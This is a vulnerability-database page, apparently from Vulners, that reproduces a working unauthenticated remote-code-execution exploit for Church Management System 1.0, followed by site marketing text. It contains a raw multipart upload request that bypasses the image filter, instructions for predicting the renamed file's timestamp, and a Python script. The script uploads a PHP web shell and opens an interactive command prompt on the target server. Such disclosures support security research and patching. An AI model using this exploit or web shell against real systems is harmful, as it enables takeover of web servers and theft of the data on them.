Vulners
Lucene search
Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.
# Exploit Details:
# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
# 2. Set the 'f' parameter of the POST request to 'save'.
# - `Users.php?f=save`
# 3. Capture request in burp and replace with with following request.
'''
POST /church_management/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
Content-Length: 859
Origin: http://localhost
Connection: close
Referer: http://localhost/church_management/admin/?page=user
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="id"
1
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="firstname"
Adminstrator
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="lastname"
Admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="username"
admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="password"
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream
<?php echo phpinfo(); ?>
-----------------------------91105564325608762312322546550--
'''
# ` Image uploader is renaming your payload using the following function.
# strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
# you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
# and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
# concate output with your playload name like this 1632085200_phpinfo.php
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.
# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/
import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Church Management System v1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
print(r"""
.----------.
.-''-. / /
. __ __ ___ .' .-. ) / ______.'
.'| | |/ `.' `. / .' / / / /_
.' | | .-. .-. ' (_/ / / / '''--.
< | __ __ | | | | | | ,.----------. / / '___ `.
| | ____ .:--.'. .:--.'. | | | | | |// \ / / `'. |
| | \ .' / | \ | / | \ || | | | | |\\ /. ' ) |
| |/ . `" __ | | `" __ | || | | | | | `'----------'/ / _.-')......-' /
| /\ \ .'.''| | .'.''| ||__| |__| |__| .' ' _.'.-'' \ _..'`
| | \ \ / / | |_/ / | |_ / /.-'_.' '------'''
' \ \ \ \ \._,\ '/\ \._,\ '/ / _.'
'------' '---'`--' `" `--' `" ( _.-'
abdullahkhawaja.com
""")
GREEN = '\033[32m' # Green Text
RED = '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}
s = requests.Session()
#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}
LINK=input("Enter URL of The Vulnarable Application : ")
def webshell(LINK, session):
try:
WEB_SHELL = LINK+'uploads/'+filename
getdir = {'cmd': 'echo %CD%'}
r2 = session.get(WEB_SHELL, params=getdir, verify=False)
status = r2.status_code
if status != 200:
print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
r2.raise_for_status()
print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
cwd = re.findall('[CDEF].*', r2.text)
cwd = cwd[0]+"> "
term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
while True:
thought = input(term)
command = {'cmd': thought}
r2 = requests.get(WEB_SHELL, params=command, verify=False)
status = r2.status_code
if status != 200:
r2.raise_for_status()
response2 = r2.text
print(response2)
except:
print("\r\nExiting.")
sys.exit(-1)
#Creating a PHP Web Shell
phpshell = {
'img':
(
'shell.php',
'<?php echo shell_exec($_REQUEST["cmd"]); ?>',
'application/octet-stream',
{'Content-Disposition': 'form-data'}
)
}
# Defining value for form data
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}
def id_generator():
x = datetime.datetime.now()
date_string = x.strftime("%y-%m-%d %H:%M")
date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
timestamp = datetime.datetime.timestamp(date)
file = int(timestamp)
final_name = str(file)+'_shell.php'
return final_name
filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)
shell_upload = True if("Undefined index: id in" in upload.text) else False
u=shell_upload
if u:
print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
print(RED+"[-]Failed To Upload The PHP Shell!", RESET)
#Executing The Webshell
webshell(LINK, s)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Sep 2021 00:00Current
7.4High risk
Vulners AI Score7.4